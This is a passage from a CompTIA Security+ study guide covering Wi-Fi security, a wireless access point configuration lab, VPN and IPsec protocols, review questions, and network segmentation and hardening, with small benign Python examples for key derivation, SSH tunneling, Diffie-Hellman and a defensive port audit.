be unexpectedly susceptible to brute force cracking; an attacker can solve any PIN in a
matter of hours. While this might keep out casual freeloaders, that's no time at all for a
determined intruder, so WPS is not recommended for real security.
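
Here is a minimal sketch of the WPA-Personal key derivation mentioned above: the passphrase is run through PBKDF2-HMAC-SHA1, with the SSID as the salt and 4,096 iterations, to produce the 256-bit PSK. The SSID and passphrase below are made up, but the calculation shows why an unusual SSID and a long passphrase both matter: precomputed (rainbow) tables only help an attacker against common SSIDs.

    import hashlib

    ssid = "ExampleCorpWiFi"                        # made-up SSID; it acts as the salt
    passphrase = "correct horse battery staple"     # made-up passphrase (8-63 ASCII characters)

    # WPA/WPA2-Personal: PSK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits)
    psk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

    print(psk.hex())   # the same 64-hex-digit key a user could enter directly instead of a passphrase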

By default, WEP uses a pre-shared passkey for authentication. While it's not a part of the Wi-Fi standard,
WEP devices from Cisco and some other vendors support an authentication system using Lightweight
Extensible Authentication Protocol (LEAP). In addition to adding individual credentials and mutual authentication,
LEAP enables dynamic encryption keys for WEP itself. While it still has some vulnerabilities, and its overall
security is inferior to WPA-Enterprise, LEAP is at least much more secure than WEP itself. A more secure
replacement for LEAP, EAP-FAST, fixes most of LEAP's vulnerabilities while remaining easier to configure
than PEAP or other EAP variants.

Exercise: Securing a WAP


This exercise uses an online emulator of a common wireless access point interface. You can use a different
emulator, or a real WAP, and it will probably have the same available settings. Every manufacturer, model,
and firmware revision has interface differences, however, so the exact steps will differ.
Since the emulator is a public web site, you can use it from any browser. However, it's possible the site may
move or change. If the site is no longer available at the time you're taking this class, use a real WAP or a
different emulator.
Do This How & Why

1. In your web browser, navigate to http://ui.linksys.com/WRT320N/1.0.00/


Like most WAPs, this model uses a simple web-based interface. By default, it opens to a page that
allows you to set up its WAN connection and DHCP server, but right now you're just going to
configure it as a WAP.

2. Configure basic wireless settings.

a) On the navigation bar, click Wireless. By default it uses an automatic WPS configuration with default
settings, but it's not secure so you'll configure it manually.

b) Click Manual. By default, the router is using the 2.4 GHz wireless band.
Switching to 5 GHz would reduce interference sources, but
also reduce maximum range.

c) From the Network Mode list, select Wireless-N Only. All devices on your network should support
802.11n, so you'll disable older modes which might cause performance or security issues.

d) In the Wireless Network Name box, type a unique name. Try to choose something unique: keeping the
default SSID, or even just a common one, makes you more vulnerable to rainbow table attacks.

e) Next to SSID Broadcast, check Disable. You'd rather not advertise your network to anyone browsing,
but anyone who knows the name can still easily connect.

3. Configure security settings. By default, no security is enabled. You generally want to use
the strongest encryption compatible with all clients.

a) In the second row of the navigation bar, click Wireless Security. Don't click "Security" in the main
navigation bar. WEP is an old and weak security standard, while the others can all be effective if properly
configured; both WPA and WPA2 are more secure. In this menu, "RADIUS" itself means WEP with a
RADIUS server for extra security.

b) Select WPA2 Enterprise. WPA2 is a bit stronger than WPA. Enterprise mode means it uses a RADIUS
server for 802.1X authentication, rather than a shared passphrase on the WAP. A new section appears with
WPA2 settings.

c) From the Encryption list, choose AES. TKIP is less secure.

d) Set RADIUS Server to 10.10.10.2 and RADIUS Port to 1812. You configured this RADIUS server in
Windows Server 2012 earlier.

e) In the Shared Secret field, type P@ssw0rd. You'd put a real password here.

4. At the bottom of the page, observe the Save Settings button. On a real AP, the settings wouldn't be
applied until you saved them.

5. On the second row of the navigation bar, click Advanced. You can access more advanced transmission
and access control features from this page. AP Isolation can be used to prevent wireless clients from
directly communicating, enhancing security.

6. Click Wireless MAC filter. You can create a MAC whitelist or blacklist to restrict access
to the WAP. Like hiding the SSID, this doesn't give real
security, but it's helpful on top of strong authentication.

7. Close your web browser.

Wireless settings at the end of the exercise

Virtual private networks


Traditionally, if you wanted to securely create remote access to a LAN, or join two widely separate LANs,
you had to use a point-to-point WAN connection. Circuit-based connections give some level of privacy across
untrusted networks, and PPP can carry just about any protocol or service the LAN can. This worked pretty
well when individual users had modems and businesses had leased lines or the like, but in modern situations
when it's faster and cheaper to just have broadband internet access, the old way is expensive and inefficient.
On the other hand, direct internet communications aren't very secure.

Exam Objective: CompTIA SY0-501 2.1.2.1, 3.2.3, 3.2.4.7


Today, virtual private networks (VPNs) allow secure communication across the internet, effectively making a
virtual point-to-point connection. This connection can allow authentication and encryption not normally used
on the internet. It can also support tunneling to transmit non-routable or non-TCP/IP protocols across the
internet. In fact, it doesn't even have to be the internet: you can use a VPN to log into a secured LAN from
across the larger enterprise network, or to secure all traffic to or from computers on an open wireless network.
VPNs can be classified according to their topology, or according to the protocols used. The topology
classification is simplest, since it exactly mirrors the ways you can use a traditional PPP connection.

 Host-to-host
 Host-to-site, or remote access
 Site-to-site

Each end of the virtual PPP connection needs a means to actually perform VPN functions. On a host end this
is commonly an ordinary software service or application. On a site end, the VPN endpoint might be built into
a router's functions, or it could be a specialized hardware device called a VPN concentrator. A site-to-site
VPN in particular is completely transparent to the hosts actually using it, since all the VPN functions are
handled by a router or concentrator, but it can secure all traffic sent over the link.

VPN components
VPNs serve two different functions: enhancing security across public networks, and allowing LAN traffic to
transparently be carried across a public network with different protocols or addressing. Past that, both
functions can be broken down into multiple components and scenarios, and every VPN is going to have
different requirements for each goal.
To achieve these goals, VPN protocols incorporate a combination of three technologies.

 Authentication
 Tunneling
 Encryption

Not all VPNs actually need encryption: a trusted delivery network relying on the WAN provider's security
measures might consider it optional. Additionally, several VPN functions can be achieved with protocols not
unique to or even chiefly associated with VPNs. In particular, RADIUS, TACACS+ and RRAS all can
provide AAA for incoming VPN connections just like they do with dial-in users.

Tunneling methods
VPNs can be categorized by just what network communications are sent through the tunnel.

Exam Objective: CompTIA SY0-501 2.1.2.3


Traditional VPN connections are what is called a full tunnel connection. When you connect to the VPN, all
your network traffic is routed through the VPN tunnel, regardless of where it's actually going. If you use a full
tunnel for remote access to your workplace, all your network requests are sent to your work network, just as
if you were physically connected there, only protected by the VPN tunnel. This is very secure, and it's ideal for
when you want to securely access resources on your work network, but it has potential drawbacks when you
want to access internet resources. Most importantly, it means that all of your "outside" network connections
increase the load on the VPN whether they need to be secured or not. If you're playing streaming video while
syncing your company email over the VPN, the VPN concentrator at your workplace has to connect to the
streaming server itself, download the video, and send it through the tunnel. This doesn't just cause a needless
network load for your workplace, but it might introduce bottlenecks and high latency from your perspective.

One solution to this is a split tunnel VPN, which only tunnels traffic addressed to specific destination ranges.
Like a router, the VPN reads the destination of each packet and decides whether it should be sent through the
tunnel, or over the open internet connection. A typical split tunnel connection to a workplace might tunnel
only communications with addresses on the company intranet, while all other traffic goes directly to the
internet. Split tunnels are more efficient, but they're not compatible with all clients or network configurations.
Additionally, they're not helpful if you want to protect all traffic, for example to safely use an unencrypted
Wi-Fi network.

Some tunneling solutions are actually intended to only work for a single port or connection. Usually such a
configuration won't be called a "VPN", but it might be, especially when it's used for similar purposes, such as
accessing a LAN-only resource over the internet. Much like a split tunnel, this minimizes any negative impacts
of the VPN, but also reduces its functionality.

Always-on VPNs
Traditionally VPNs are used by remote workers to connect to intranet resources, but it's become increasingly
popular to use VPN technologies to protect all network traffic on untrusted networks both to secure
communications and to protect the device itself from internet threats. A new technology in VPN clients is the
always-on VPN, which automatically detects whenever the device is connecting to an untrusted network and
establishes a VPN connection. If it cannot connect to the VPN, it will display a warning and may block some
or all traffic on the open network.

Exam Objective: CompTIA SY0-501 2.1.2.4


Always-on VPNs are useful for higher security environments and mobile devices, since they can reduce the
possibility of user error in connecting to unsecured networks. They are frequently paired with strict device
policies preventing users from disabling the VPN, and NAC policies including posture assessments and
quarantines.

Discussion: VPNs
1. When might you want to configure a site-to-site VPN?
Answers may vary, but it will usually involve joining two private LANs across a non-trusted network:
either a larger non-secured LAN or a WAN.
2. When might you want a full-tunnel VPN connection even if it hurts network performance?
One example is when you're on a Wi-Fi network you don't totally trust and want to make sure no one
eavesdrops on or attacks your internet communications.

VPN technologies
There are a number of protocols that can be used to form the core of a VPN solution.

Exam Objective: CompTIA SY0-501 2.1.2.4

GRE Generic Routing Encapsulation encapsulates almost any L3 protocol in a virtual point-to-point
link. It's used for tunneling, but has no other VPN functions on its own; consequently, it's a
common component in other VPN protocols.
PPTP Point-to-Point Tunneling Protocol is a very basic VPN protocol developed by a vendor
consortium including Microsoft, 3Com, and others. It encapsulates PPP packets over GRE to
provide VPN tunneling features, allowing it to carry any protocol PPP can including IP, IPX,
and NetBEUI. On its own, PPTP doesn't specify encryption or authentication methods, but
rather relies on the vendor implementation to include those. Since it's a low level protocol it
can be seamlessly applied to all sorts of network traffic, but its control functions require TCP
port 1723 and IP protocol 47 (GRE) to be allowed through the firewall. The most common PPTP
implementation is Microsoft's, which has been included in their operating systems since
Windows 95. It supports PAP, CHAP, and MS-CHAP authentication, and Microsoft Point-to-
Point Encryption (MPPE). Unfortunately, none of those methods provide very strong security,
and more secure PPTP implementations aren't widely supported.

L2TP/IPsec Layer 2 Tunneling Protocol is an IETF standard based on elements of PPTP and Cisco's similar
Layer 2 Forwarding protocol (L2F). Like PPTP it doesn't include encryption or authentication,
but it's less limited in what protocols it uses for those functions, and unlike PPTP it even
encrypts link negotiations. Most commonly L2TP uses RADIUS or TACACS+ authentication,
and Internet Protocol Security (IPsec) encryption. That particular combination is called
L2TP/IPsec, and is natively supported by most modern operating systems. When implemented
correctly it can be very secure, but it uses a double encapsulation method that can hurt
performance. An L2TP/IPsec VPN requires UDP ports 500 and 1701; if NAT traversal is
required, it also needs UDP port 4500 to be open.
SSL/TLS The same SSL/TLS protocols widely used in secure web servers can be used for tunneling,
strong encryption, and certificate-based authentication. Since they're high level protocols,
earlier and simpler SSL VPNs were fairly application-limited, but had the advantage of using a
web browser rather than a separate client application. Newer implementations can tunnel the
entire IP stack; while this approach doesn't fit neatly within OSI terminology, it can provide a
robust and secure alternative to traditional L2TP/IPsec VPNs, often even with higher
performance. SSL/TLS VPNs are available from many vendors, but their capabilities vary.
Common examples include the open source OpenVPN, and Microsoft's Secure Socket
Tunneling Protocol (SSTP). One benefit of SSL/TLS VPNs is that they often only need TCP
port 443 to be opened, just like an HTTPS server. They also can limit access to the network,
restricting the damage done by a compromised client.
SSH Secure Shell has encryption, authentication, and tunneling features, so can be used as a sort of
VPN. "A sort" is a good way to put it: it wasn't really meant for the purpose, and usually it's
used for tunneling a single application at a time or for port forwarding. It's still useful in
specific situations, and can provide fairly strong security. SSH itself operates on TCP port 22,
but when used as a VPN it often opens other ports for particular applications.
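
To make the "single application at a time" idea concrete, the sketch below launches a standard OpenSSH client from Python to forward one local port through an SSH tunnel; the hostnames are placeholders. Local connections to port 8443 then reach the intranet server through the encrypted tunnel, which is how SSH can fill in for a VPN in narrow cases.

    import subprocess

    # -N: don't run a remote command, -L: forward local port 8443 to intranet.example.com:443
    # (hostnames are examples only; the gateway must accept SSH logins from this user)
    tunnel = subprocess.Popen([
        "ssh", "-N",
        "-L", "8443:intranet.example.com:443",
        "admin@gateway.example.com",
    ])

    # ... while the process runs, https://localhost:8443 is carried inside the SSH tunnel ...

    tunnel.terminate()   # close the tunnel when finished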

IPsec
IPsec is most associated with VPNs, but it can provide end-to-end L3 security on any IP network. It was
originally developed as a core protocol for IPv6, but was adapted for IPv4 use and is available in most IPv4
implementations. Like VPNs it can be used to protect traffic host-to-host, host-to-network, or network-to-
network; the difference is simply whether each end of the VPN is run by a router or a single host. Since it
operates at Layer 3, it can protect all IP traffic on a network without needing any explicit application support.
IPsec is actually a suite comprised of three protocols: used together, they provide confidentiality, integrity,
and authenticity. They're all based on the idea of security associations (SAs) between two or more
communicating nodes. An SA defines a policy for unidirectional flow of data from one point to another:
security methods, endpoint addresses and ports, and so on. All traffic falling under a specific SA is treated the
same in terms of security standards. Since an SA is unidirectional, secure bidirectional communication
between two hosts requires each to establish an SA for traffic directly to the other.

Internet Key Exchange Negotiates and authenticates SAs between two hosts and exchanges encryption
(IKE) keys to set up a secure channel. It also manages existing SAs, and periodically
replaces keys during a session. It's actually a specific implementation of the
Internet Security Association and Key Management Protocol (ISAKMP)
framework for key exchange.
Authentication Header Provides data integrity and source authentication through cryptographic hashes of
(AH) the packet contents and source identity. Also provides protection features for the
IP header itself.
Encapsulating Security Encrypts the packet payload itself, along with integrity and authentication
Payload (ESP) information.

The three protocols don't have to be used together. AH and ESP both provide integrity and authentication, so
if you don't need both an encrypted payload and a protected header you don't need to use both. In fact, since
using both protocols requires two SAs in each direction and additional processing overhead, it's common to
use only one of the two. IKE can't be dispensed with, but it can be replaced with other ISAKMP
implementations.
Since it provides tunneling and the entire CIA triad, IPsec can be used as a complete VPN solution in itself,
and there are some clients that do so. An IPsec-only approach has some limitations though, which is why
traditional clients use it along with L2TP.
 IPsec can tunnel only IP traffic, while L2TP can work with any L3 protocol or even L2 protocols.
 L2TP is usable over existing PPP infrastructure, so requires less modification for existing networks.
 IPsec authentication relies on host-based keys or certificates, while L2TP allows user-based
authentication systems like RADIUS. Newer IPsec implementations allow additional authentication
methods.

IKE negotiation
IKE, presently at version 2, functions to negotiate and maintain SAs, creating tunnels that carry AH and ESP
traffic. The entire IPsec process uses cryptographic tools for several purposes, and there are multiple options
for each of them.
 For authentication, host (or peer) identities are established through X.509 certificates or preshared keys.
Keys require less infrastructure and expense, but are harder to maintain on large networks. Some
implementations allow other methods, like EAP, or Kerberos authentication within a Kerberos
realm/domain.
 Key exchange is performed with any of a number of Diffie-Hellman algorithms (see the toy example after this list).
 Data encryption ciphers include AES, Blowfish, 3DES, or DES, with the usual caveat that DES is no
longer secure.
 Integrity hashes include MD5, SHA-1, and SHA-2.
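
Here's a toy illustration of the Diffie-Hellman idea referenced in the list above, using deliberately tiny numbers. Real IKE negotiations use standardized groups with very large primes (or elliptic curves), but the principle is the same: each peer combines its own private value with the other's public value, and both arrive at the same shared secret without it ever crossing the wire.

    # Toy Diffie-Hellman exchange: illustration only, numbers far too small for real use
    p, g = 23, 5          # public prime modulus and generator (the "group" parameters)
    a, b = 6, 15          # each peer's private value, never transmitted

    A = pow(g, a, p)      # initiator sends g^a mod p
    B = pow(g, b, p)      # responder sends g^b mod p

    shared_initiator = pow(B, a, p)   # (g^b)^a mod p
    shared_responder = pow(A, b, p)   # (g^a)^b mod p
    assert shared_initiator == shared_responder   # both sides now hold the same secret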

The IKE process begins when a peer notices "interesting" traffic; that is, traffic which matches patterns
defined in its IPsec settings. For example, on a site-to-site VPN, a router might initiate IPsec whenever traffic
from its internal subnet is addressed to a specific other subnet.
IKE performs negotiations in multiple request/reply exchanges, where the initiator lists acceptable security
settings and the responder sends back its chosen options. The specifics differ a lot between IKEv1 and IKEv2.
While both perform the same functions in the same order, IKEv2 uses fewer exchanges and uses different
terminology.
In both versions there are two primary phases to negotiation.

1. The peers authenticate each other and negotiate an initial bidirectional SA that enables them to secretly
perform further negotiations. In IKEv1 this is called an ISAKMP tunnel and both peers must use the same
authentication method, while in IKEv2 it is an IKE SA and each peer can use its own valid authentication
method in what's called asymmetric authentication.
2. The peers use the initial SA to negotiate the SAs that actually carry data. This is where encryption and
other settings are defined for AH and/or ESP. In IKEv1 the resulting combination is called an IPsec
tunnel, and in IKEv2 they're all called child SAs.
IKEv2 has a number of improvements over IKEv1. Some of them are simplification and refinement: it can
negotiate more quickly and efficiently, it has fewer redundant communication and encryption options so that
peers can be configured more easily, some vulnerabilities were fixed, and it has increased reliability features.
Others are entirely new features: IKEv2 supports EAP authentication for remote access VPNs, it has support
for numerous new extensions, and it can work for environments where IKEv1 had problems, like multi-
homing mobile clients or connections that pass through NAT devices. Both versions are generally considered
very secure when properly configured; however, leaked US government documents suggest IKE has
unpublished vulnerabilities the NSA, and perhaps others, are able to exploit.

IPsec traffic
Both AH and ESP carry data protected by IKE's keys. Since they offer different services, they can be
combined for maximum security, but since they also have a lot of overlap, it's more common to pick just one
for performance reasons.

Exam Objective: CompTIA SY0-501 2.1.2.2


Both protocols can operate in two modes: tunnel, or transport.
 In tunnel mode IPsec encapsulates and protects the entire IP packet, appends its own protocol header,
and adds a new IP header for tunneling over the public network. The original packet is fully protected
by AH or ESP, while the outer IP header can use different IP addresses. Tunnel mode is popular for site-
to-site configurations, and allows IPsec to be a more complete VPN solution, but it comes at the cost of
increased overhead and chance of packet fragmentation.
 In transport mode, IPsec creates its cryptographic protections for the packet payload, then inserts its own
headers into the original packet. It keeps the original IP header, but changes the protocol ID to show that it's
IPsec traffic. Transport mode is
useful just to secure ordinary end-to-end IP traffic without using a VPN; it can also be used to secure
VPNs using other, non-secure tunneling protocols like GRE.

Of the two protocols, ESP is more complicated. It's more computationally expensive because encrypting and
decrypting the entire payload takes a lot of mathematical work. It also has a lot of packet size overhead even
in transport mode: not only does each packet have an ESP header in the front and an Integrity Check Value
(ICV) hash value at the end, it also has an ESP trailer with both protocol data and additional padding. The
overall length is variable for all three: the encryption cipher might require an initialization vector in the
header, its block size determines how much padding is needed to round the payload out to an even number of
blocks, and the ICV hash size depends on its own algorithm.
Encryption is applied to the entire IP packet (tunnel mode) or just its payload (transport mode), as well as the
ESP trailer. The ESP header is not encrypted, but is included with all encrypted values in the ICV hash.

AH uses a single Authentication Header, thus the name. It contains protocol configuration data as well as an
ICV hash. Nothing's encrypted, but everything is signed for integrity by the ICV. Even the IP header is signed,
with the exception of fields that need to be able to change in transit, like TTL and the header checksum. This
is the source of one of AH's big limitations: source and destination IP addresses are themselves signed for
integrity, and thus protected from outside modification. Since NAT relies on changing IP addresses, it's not
compatible with AH even in tunneling mode.

Since it provides data confidentiality as well as integrity, ESP is the more popular protocol on today's
networks despite its additional overhead. It also is more compatible with NAT traversal in tunnel mode,
though since the TCP/UDP header is encrypted it still has problems with PAT. AH is preferred in more
specialized cases, like when it's more vital to ensure traffic comes only from trusted sources, or when QoS or
security systems along the way need to inspect packet contents and encryption would get in the way.

Note: NAT traversal in general has been a big stumbling block to wider adoption of IPsec in IPv4
networks: it's common for NAT gateways to incorporate special settings for IPsec traffic, but it's still a
bit of a kludge. Consider it another example of why network engineers hope to move networks to IPv6,
where there's no shortage of global addresses, and IPsec is easily supported even for ordinary end-to-
end traffic.

Creating VPN connections


There are many ways to connect to a VPN, depending on your operating system.

 A wide variety of third-party clients are available for any operating system, and many support more
features than those built into the operating system. Some VPN solutions require use of a specific client.
 Windows 7 and later include support for VPNs using PPTP, L2TP/IPSec, SSTP, and IKEv2.
Authentication methods include password, certificate, OTP, and smart card.
a) In the Network and Sharing Center window, click Set up a new connection or network.
b) Choose Connect to a workplace and click Next.
c) Enter your VPN information as provided by a network administrator.
 Windows 8.1 and Windows 10 include an updated client that supports additional VPN providers and
allows easier customization.
a) In the Settings window, click Network & Internet > VPN.
b) Click Add a VPN connection.
c) Enter your VPN information as provided by a network administrator.
 To create a VPN connection in Mac OS, open the Network window and click Add > VPN.
 To create a VPN connection in Android, navigate to Settings > Wireless And Networks > More >
VPN.
 To create a VPN connection in iOS, navigate to Settings > General > VPN.

Discussion: VPN technologies


1. Why might you choose a L2TP/IPsec VPN over SSL/TLS, or vice-versa?
L2TP/IPsec is natively supported by modern operating systems, and since it relies on low-level protocols
it can secure all communications without significant compatibility problems. SSL/TLS can be higher
performance and more secure, but it's less universally supported.
2. Why would you choose AH over ESP for IPsec, even though it doesn't encrypt packet payloads?
AH has higher performance, but usually it's for more specialized reasons, like when guaranteeing
authenticity is the most important thing, or when content filters or QoS devices need to inspect packet
contents.
3. What role does GRE play in a VPN?
GRE doesn't provide any security: it just allows virtual point-to-point connections over an IP network.

Assessment: Transport encryption


1. Order WAP encryption methods from most to least secure.

1. WEP
2. WPA-AES
3. WPA-TKIP
4. WPA2-AES
5. WPA2-TKIP
2. Your WAP is currently secured with WPA Personal encryption, using a shared key. Which of the
following is true? Choose the best response.
 Enabling WPS could increase security, but enabling 802.1X would reduce it.
 Enabling 802.1X could increase security, but enabling WPS would reduce it.
 Enabling either WPS or 802.1X could increase security.
 Enabling either WPS or 802.1X would reduce security.

3. On an IPsec VPN, what protocol negotiates security associations? Choose the best response.
 AH
 ESP
 IKE
 L2TP

4. What secure protocols add SSL/TLS security to protocols which were insecure on their own? Choose all
that apply.
 FTPS
 HTTPS
 SFTP
 SNMPv3
 SSH

5. What VPN type is secure, compatible with nearly any application, and supported by most operating
systems?
 L2TP/IPsec
 PPTP
 SSH
 SSL/TLS

6. You can use a VPN to securely encrypt all of your network communication even on an open Wi-Fi
network. True or false?
 True
 False

7. What security appliance is similar to a MitM attack, but designed to enhance network security rather than
disrupt it? Choose the best response.
 Split tunnel
 SSL accelerator
 SSL decryptor
 VPN concentrator

8. You have a lingering problem with mobile users who connect to untrusted Wi-Fi networks without
enabling their VPN, out of forgetfulness or lack of technical knowledge. What technology might help
solve the problem? Choose the best response.
 Always-on VPN
 ESP
 Full tunneling
 Secure shell

Module C: Hardening networks


It's possible, if not ideal, to secure a host just by finding each individual vulnerability and closing or
minimizing it. While it's tempting to extend that sort of thinking to the network, by just securing each host
and tightening up the firewall, it's vital to think of the big picture as well as its components. To secure your
network, you need to create a unified policy that protects its components from outside and inside attack, and
all without disrupting normal network functions.
You will learn:
 About network segmentation
 How to harden network hosts and data
 How to harden network infrastructure devices

About network segmentation


Some early network experts saw security as a "hard shell" to put around the network, defending it from
outside attacks without disrupting normal internal operations. It didn't work very well: not only are many
threats on the inside, but any crack in that outer shell makes it easy for an external threat to become an
internal one. Today, network experts recommend a defense in depth strategy, where security is applied
throughout the entire organization. That way, an attacker who breaches one layer of defense still has to
overcome the rest.
Today's networks are complex and important enough that you need to consider the network as an
organization in itself, one that needs to be broken into multiple levels and secured at each one. Not only do
hosts and devices need to be secured, but unless your organization is very small, the network isn't just a
collection of hosts on an Ethernet switch.
One of the chief tools in your arsenal for securing the network is segmentation. By breaking the network up
into multiple zones, and controlling just how each zone can communicate with the others, you can both
protect against inside threats, and make sure that an outside attacker compromising one part of the network
doesn't gain access to everything. Fortunately, segmentation is a normal part of networking technologies, and
in fact something you ought to be doing anyway for performance and reliability reasons. Adding security to
your list of concerns just means that you have to keep some additional principles in mind when you do the
segmentation.
The key to segmentation is understanding how the network is broken up into collision domains, broadcast
domains, and subnets, and making sure that if two hosts or devices are close in the network's topology, they
also share similar security needs and have a reason to communicate directly. By contrast, if two hosts
have different security needs, communication between them should be more regulated and indirect, even if it's
permitted.

Segmenting networks
It's important to segment networks in a planned, methodical fashion. Don't just draw boundaries where it
seems to make sense: consider where each device on the network fits in with its neighbors, what its security
needs are, and what sort of communications it requires.

Exam Objective: CompTIA SY0-501 3.2.2, 3.9.9

 The smallest network segment is the collision domain, as found in legacy networks separated by hubs,
and on wireless networks connected by a single WAP.
• On a wired collision domain there's no intrinsic privacy: any host can read all traffic and there's no way
to regulate communications. For this reason you should replace any legacy hubs on the network with
switches. Even an inexpensive switch with no additional security features will have security and
privacy benefits over a hub.
• A wireless hotspot can be a little better: provided encryption is in use there are some barriers from
hosts snooping on each other, but with many network configurations it's still not difficult for any client
with the encryption key to access all traffic.
• The most effective way to prevent cross-client snooping on a Wi-Fi network is to use WPA Enterprise
mode, also known as 802.1X. Since every client on the WPA Enterprise network has its own
credentials and keys, one client can't directly decrypt traffic sent to and from other clients.
 On modern switched Ethernet networks, the fundamental unit of segmentation is the broadcast domain.
While a broadcast domain has some level of traffic control, it's not really reliable: flooded packets and
broadcast traffic will travel throughout the segment, allowing eavesdropping, and any host in a broadcast
domain can directly communicate with any other. Hosts that need to communicate using non-routable
protocols must share a broadcast domain, while those in different security zones must not.
 If you’re fortunate enough that your physical network topology is compatible with the security zones
you need, you can separate broadcast domains simply by having each on its own switch or switches, and
separate each with routers or even firewalls.
 More commonly, the best L2 segmentation option is using VLANs to logically separate traffic on a
physically switched network, each VLAN serving as its own broadcast domain. While a lot more
flexible than physical segmentation, this can be a little more challenging to configure: not only do you
need to make sure the VLAN configuration is correct, but VLAN trunk links carry traffic from multiple
broadcast domains. Not only does this make them prime targets for eavesdropping, but attackers can
exploit VLAN trunking protocols to create trunk links as part of a VLAN hopping attack.
 Regardless of whether they're physical or virtual, broadcast domains need to be separated by routers.
Typically, the best practice is for each broadcast domain to correspond to a single subnet. Subnets
themselves can be separated and individually secured according to their security needs.
 Network zones with different security needs should be joined only at "chokepoints" that can easily be
used to control traffic between them.
• Chokepoints are an ideal place for network security appliances such as firewalls, IDS/IPS, and
monitoring tools.
• No traffic should be able to pass between networks without being evaluated by a secured chokepoint,
especially when passing from a less secure network to a more secure one.
• To maximize network availability, ensure that connections and security appliances can handle expected
traffic loads without causing slowdowns; no one wants a security chokepoint to also be a performance
chokepoint.
 Give special consideration to network segments with particular vulnerabilities, or that carry much
different traffic types.

• Use stricter isolation for segments with legacy devices and applications that are likely to use insecure
protocols or have unpatched vulnerabilities. If a host or application can't be effectively hardened, the
only option is to make it hard to reach.
• Restrict access to network segments holding particularly sensitive data. If it needs to be available for
outside access, make sure that appropriate security devices are in place, and use authentication and
encryption systems as needed.
• Where possible, limit outside access to specialized networks that aren't meant for normal data traffic,
like industrial control systems or SANs. Such networks tend to have limited internal security, but
they're by no means free of threats.
• While firewalls are a valuable part of any segmentation plan, adding a NIPS on the border of a
sensitive or static network gives better protection against inside attacks.
 If you need to join systems more directly over an untrusted network, configure them as members of a
VPN. Secure VPN protocols offer encryption and tunneling features that even allow secure
communications over an insecurely segmented network or unencrypted Wi-Fi network.
 When you absolutely must make sure it's impossible to launch a network attack from one network to
another, the only solution is an airgap: a complete isolation of the network with no connectivity to
outside systems. Airgapping is a common way to protect classified networks, mission-critical systems,
and other devices with security needs that outweigh the convenience of connectivity to standard
networks.
• A traditional air gap allows no physical layer (including wireless) connections to untrusted networks.
• VLANs can be used to emulate an air gap by giving no path into or out of an isolated network, but this
method is still subject to some attacks and misconfigurations.
• Unidirectional gateways can be used to send information one way into a network without allowing
information to come out. This prohibits most network attacks from functioning, but also most benefits
of networking.
• Even an airgap can't protect against exfiltration or malware, if it's done via removable storage or
computers that connect to the isolated network.

Securing network data


As useful as they are, networks are a natural enemy to data security: just connecting a system with sensitive
data to the network makes the data vulnerable to attackers. If the data is simply being stored, this risk can be
mitigated by securing hosts and applications, but the real challenge is securing the ever-increasing amount of
data that needs to be accessible from or transmitted through the network. In addition to the normal precautions
of securing data, you should consider its security from the network design perspective.

 Identify where sensitive data is stored on the network, whether it's designed for external access or not.
Make sure that all data is kept in a network security zone appropriate to its type and sensitivity level.
 Secure data at rest by making sure the hosts or devices storing it are hardened against attack, especially
unauthorized remote access.
 Secure data in transit using appropriate security measures.
• Over untrusted networks, use protocols with strong encryption and authentication features.
• When you must share data using insecure protocols, restrict it to small, trusted network segments
or secured VPNs.
 Identify information that's subject to particular legal or regulatory requirements, such as PCI-DSS or
HIPAA. Very often, these regulatory frameworks have specific requirements for network storage or
transmission of data, so you'll need to make sure that such data is secured in a way that meets both your
organization's needs and the regulatory body's standards.

Hardening network hosts and applications


The security needs of a network application or host depend largely on the security zone they're in, and what
sort of systems can access them. Hosts and applications accessible from the internet need the highest level of
security, while on trusted network segments you might be able to use insecure protocols and services.

 To prevent system sprawl and detect rogue devices, keep updated lists of just what hosts exist on the
network, along with the owner and purpose of each.
 Regularly apply new security updates to network applications and host operating systems.
• Centrally organize patch management in order to make sure that all hosts on the network are kept up to
date.
• Upgrade or replace legacy systems and applications that do not meet modern security standards.
• Apply special scrutiny to legacy systems which cannot be easily replaced.
 Disable all unnecessary services on hosts, and network features on applications.
 Ensure that appropriate host-based firewall software is installed and configured, and that only necessary
ports are left open.
 Install antivirus and antimalware software, along with any other required HIDS/HIPS software.
 Disable unnecessary user accounts, both local and domain-based.
 If a host is only directly accessed by its local users, disable remote login methods.
 Ensure that remotely accessible hosts use strong passwords and other authentication systems.
 Apply heightened scrutiny to network applications:
• Web browsers and email clients are popular targets of attack so should be carefully secured using
application settings and antimalware software features.
• Avoid insecure protocols such as Telnet, TFTP, SLIP, and SNMPv1 and v2. FTP and HTTP are harder
to avoid, but still use unencrypted data and clear text credentials: use SSL encryption for both when
possible.
• Configure security and encryption options for secure protocols like SNMPv3, SSL, SSH, and so on.
• Disable unnecessary network services, especially applications running on client machines.
 Establish policies for acceptable and unacceptable applications on network hosts. Even non-network
applications can have vulnerabilities; some might even be Trojan horses, or carry virus infections.
 Establish specific security requirements for devices that aren't a permanent part of the LAN.
• Company-owned laptops and mobile devices that may leave the premises
• User-owned laptops and mobile devices (Bring Your Own Device policies)
• Hosts joining the network via PPP or VPN
• External storage media, including portable hard drives or USB flash drives.
 Establish onboarding and offboarding procedures for devices added to or removed from the network,
and ensure that devices are joined only to appropriate network segments.
 Monitor the network regularly for rogue hosts or unauthorized services (a simple port-audit sketch follows this list).
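
To make the port and rogue-service points above a little more concrete, the following Python sketch checks one host against the list of TCP ports you expect it to have open and flags anything else that answers. The address and approved ports are placeholders, and a real audit would use a purpose-built scanner such as Nmap (covered later in this chapter); this just shows the underlying idea.

# Sketch: flag listening TCP ports that aren't on the approved list for a host.
import socket

HOST = "10.0.0.10"               # placeholder address of the host being audited
APPROVED = {22, 443}             # ports this host is supposed to have open
CHECK_RANGE = range(1, 1025)     # well-known ports only, to keep the example quick

for port in CHECK_RANGE:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(0.2)                         # short timeout; closed or filtered ports won't answer
        if s.connect_ex((HOST, port)) == 0:       # 0 means the TCP connection succeeded
            status = "approved" if port in APPROVED else "UNEXPECTED - investigate"
            print(f"Port {port} open ({status})")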

Securing internal network infrastructure


Unless your security needs are off the charts, the internal network has some level of trust. It's a place where
hosts need to directly contact each other, and where you can safely host services you wouldn't put on the
internet. That doesn't mean it's a place without cares or barriers, though, especially in larger and more complex
enterprise networks.


Exam Objective: CompTIA SY0-501 2.6.2.8, 3.3.2.8

